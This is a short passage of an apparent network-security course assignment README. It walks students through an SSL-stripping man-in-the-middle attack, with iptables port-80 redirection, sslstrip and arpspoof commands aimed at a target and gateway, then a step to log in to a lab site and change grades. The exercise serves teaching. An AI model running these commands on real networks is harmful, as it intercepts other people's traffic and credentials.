ChristophSchmidl/network-security/assignment-6/README.md

 				sudo iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port <listenPort>
 				sudo sslstrip.py -l <listenPort>
 				sudo arpspoof -i <interface> -t <targetIP> <gatewayIP>

+			* First, arpspoof convinces a host that our MAC address is the router’s MAC address, and the target begins to send us all its network traffic.
+The kernel forwards everything along except for traffic destined to port 80, which it redirects to $listenPort (10000, for example).

+At this point, sslstrip receives the traffic and does its magic.

 		* Running sslstrip nicely explained: http://jkook.blogspot.de/2009/09/sslstrip-step-by-step-on-ubuntu.html

 	* e) Finally, log in to the website, find your grades, and edit them to your desired result.
 After that, write your student numbers and the result you set to **exercise1e**.